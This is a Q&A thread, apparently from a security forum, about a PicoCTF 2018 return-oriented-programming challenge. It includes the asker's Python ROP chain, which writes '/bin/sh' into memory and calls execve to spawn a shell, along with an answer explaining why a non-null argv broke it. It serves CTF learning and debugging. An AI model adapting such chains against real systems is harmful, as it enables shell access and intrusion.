# Where in a binary can '/bin/sh' be written to get a shell?

Tags: linux, attacks, buffer-overflow, shellcode, rop

I've come across some behaviour in a CTF challenge that seems very strange and I was wondering if someone could help me understand it.

The CTF challenge was the [can-you-gets-me challenge in PicoCTF2018](https://ctftime.org/task/6767).

It was a ROP challenge (32-bit), and in my initial attempt, I wrote '/bin/sh\x00' to a spot in the middle of the `.data` section (`0x080ea6a0`), but when I ran the exploit, I got:

```
/bin/sh: 1: /bin/sh: Syntax error: word unexpected (expecting ")")
```

After looking online at some solutions, I found they were using different addresses to me. I tried one of them and found that the exploit worked with an address (`0x80e9d60`) which doesn't appear to be in any section.

The `readelf` output for the sections was:

```
$ readelf gets -S
There are 31 section headers, starting at offset 0xb0cc8:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480f4 0000f4 000020 00   A  0   0  4
  [ 2] .note.gnu.build-i NOTE            08048114 000114 000024 00   A  0   0  4
readelf: Warning: [ 3]: Link field (0) should index a symtab section.
  [ 3] .rel.plt          REL             08048138 000138 000070 08  AI  0  23  4
  [ 4] .init             PROGBITS        080481a8 0001a8 000023 00  AX  0   0  4
  [ 5] .plt              PROGBITS        080481d0 0001d0 0000e0 00  AX  0   0 16
  [ 6] .text             PROGBITS        080482b0 0002b0 07253c 00  AX  0   0 16
  [ 7] __libc_freeres_fn PROGBITS        080ba7f0 0727f0 000a6d 00  AX  0   0 16
  [ 8] __libc_thread_fre PROGBITS        080bb260 073260 00009e 00  AX  0   0 16
  [ 9] .fini             PROGBITS        080bb300 073300 000014 00  AX  0   0  4
  [10] .rodata           PROGBITS        080bb320 073320 01a8ac 00   A  0   0 32
  [11] __libc_subfreeres PROGBITS        080d5bcc 08dbcc 000028 00   A  0   0  4
  [12] __libc_atexit     PROGBITS        080d5bf4 08dbf4 000004 00   A  0   0  4
  [13] __libc_thread_sub PROGBITS        080d5bf8 08dbf8 000004 00   A  0   0  4
  [14] .eh_frame         PROGBITS        080d5bfc 08dbfc 012b10 00   A  0   0  4
  [15] .gcc_except_table PROGBITS        080e870c 0a070c 0000d0 00   A  0   0  1
  [16] .tdata            PROGBITS        080e9f5c 0a0f5c 000010 00 WAT  0   0  4
  [17] .tbss             NOBITS          080e9f6c 0a0f6c 000018 00 WAT  0   0  4
  [18] .init_array       INIT_ARRAY      080e9f6c 0a0f6c 000008 00  WA  0   0  4
  [19] .fini_array       FINI_ARRAY      080e9f74 0a0f74 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        080e9f7c 0a0f7c 000004 00  WA  0   0  4
  [21] .data.rel.ro      PROGBITS        080e9f80 0a0f80 000070 00  WA  0   0 32
  [22] .got              PROGBITS        080e9ff0 0a0ff0 000008 04  WA  0   0  4
  [23] .got.plt          PROGBITS        080ea000 0a1000 000044 04  WA  0   0  4
  [24] .data             PROGBITS        080ea060 0a1060 000f20 00  WA  0   0 32
  [25] .bss              NOBITS          080eaf80 0a1f80 000e0c 00  WA  0   0 32
  [26] __libc_freeres_pt NOBITS          080ebd8c 0a1f80 000018 00  WA  0   0  4
  [27] .comment          PROGBITS        00000000 0a1f80 000035 01  MS  0   0  1
  [28] .shstrtab         STRTAB          00000000 0b0b7c 00014c 00      0   0  1
  [29] .symtab           SYMTAB          00000000 0a1fb8 007ec0 10     30 847  4
  [30] .strtab           STRTAB          00000000 0a9e78 006d04 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  p (processor specific)
```

And here are some examples of addresses that worked:

- `0x080e9d60` (mentioned above)
- `0x080e9ff0` (`.got`)
- `0x080ebd8c` (`libc_freeres_ptrs`)
- `0x080e9f3c`
- `0x080e9f4c`
- `0x080e9f4c`
- `0x080ea040`
- `0x080eaf60`
- `0x080ebd6c`

My question is: **What is so special above these addresses that allow the exploit to work, while the others do not?** i.e. What criteria should one look at in order to choose an address for writing data in an exploit?

**The ROP Stack**
Here is part of the python script that I am using to generate the payload, for reference:

```
# Changing this variable is what makes the chain work or fail.
data = 0x80e9d60

# Useful addresses
pop_eax = 0x080b81c6 # pop eax; ret;
pop_ebx = 0x080481c9 # pop ebx; ret;
pop_ecx = 0x080de955 # pop ecx; ret;
pop_edx = 0x0806f02a # pop edx; ret;
swap_eax_edx = 0x0809cff5 # xchg eax, edx; ret;
zero_eax = 0x08049303 # xor eax, eax; ret;
syscall = 0x0806f630 # int 0x80; ret;
write = 0x080999ad # mov dword [edx], eax; ret

# /bin/sh string
str1 = '/bin'
str2 = '/sh\x00'

# The buffer to overwrite with junk
payload = 'A'*28

# Write 1 (/bin)
payload += p32(pop_eax)
payload += str1
payload += p32(pop_edx)
payload += p32(data)
payload += p32(write)

# Write 2 (/sh)
payload += p32(pop_eax)
payload += str2
payload += p32(pop_edx)
payload += p32(data + 4)
payload += p32(write)

# Write pointer to /bin/sh
payload += p32(pop_eax)
payload += p32(data)
payload += p32(pop_edx)
payload += p32(data + 8)
payload += p32(write)

# Set edx to 0
payload += p32(zero_eax)
payload += p32(swap_eax_edx)

# Make the syscall with the correct values in registers
payload += p32(pop_ebx)
payload += p32(data)
payload += p32(pop_ecx)
payload += p32(data + 8)
payload += p32(pop_eax)
payload += p32(0xb)
payload += p32(syscall)
```

**Edit:** After some more research, one possible explanation I've come up with is that the new `/bin/sh` process overwrites portions of memory. See https://stackoverflow.com/a/5429592/6567876. Is that the reason?

Comment: At least provide your ROP stack that doesn't work if you want us to help analyze.

Comment: I tried this https://github.com/0n3m4ns4rmy/ctf-write-ups/blob/master/Pico%20CTF%202018/can-you-gets-me/exploit.py with an address 'in the middle of the .data section' and it worked. So you are probably doing something wrong while ropping.

Comment: Thanks, just added the ROP chain: that solution online is actually the one I was referring to that worked, except according to my `readelf` output in the question, that address is not actually anywhere in `.bss`.

Comment: What is the address that you used that did not work?

Comment: Well there were obviously many that didn't work, but the first one that didn't was a random spot I picked in the middle of the `.data` section: `0x080ea6a0`.

Answer (score 2, accepted):

You should be able to write to any writable page (unless the address contains some bad byte that the input vector will use as a delimiter or filter out). `0x80e9d60` is one such writable region.
There is nothing inherently wrong with the address `0x080ea6a0` (which lies in main_arena) that you are using either.

When you are executing `int 0x80`, the relevant registers are:

> eax: 0xb (syscall: sys_execve)
>   ebx: 0x80ea6a0 (filename: "/bin/sh")
>   ecx: 0x80ea6a8 (argv: [0x080ea6a0, 0x080ea6a0, ...])
>   edx: 0x0000000 (envp: null)

Do you see the problem with `argv`?
In the original rop stack in the writeup, they are zeroing out `ecx`. But your `ecx` is just `address+8`, which may or may not contain null bytes depending on the `address`. So you are essentially calling `/bin/sh *garbage* *garbage* ..`, whereas it should have been just `/bin/sh`. So the code is actually being executed, but `/bin/sh` becomes confused with the garbage arguments being passed along.

You need to make `argv` null or some other sane value (if you actually intend to pass along any args). So either modify your ROP stack to null out `ecx (argv)`, or choose an address where you have null at `address + 8`.

Make it a habit to run your exploit in a debugger to see what is actually happening.

Comment: Wow, thanks, that completely makes sense now. I was using a debugger, but thought that I had to pass a pointer to the program name in `ecx`. (I understand now that is only a convention and not necessary). I see now that what I was doing wrong was not zeroing out the space after the pointer to make sure that there would be a null byte there, is that correct? Anyway, thanks so much for the brilliant answer!

Comment: Yes, that is correct (not just one null byte however, a null pointer (a dword)). Or you could also just pick an address for argv that is known to contain a null pointer.

Comment: Right, thanks - I guess if it was just a byte it wouldn’t be able to distinguish between the end and (say) a small integer.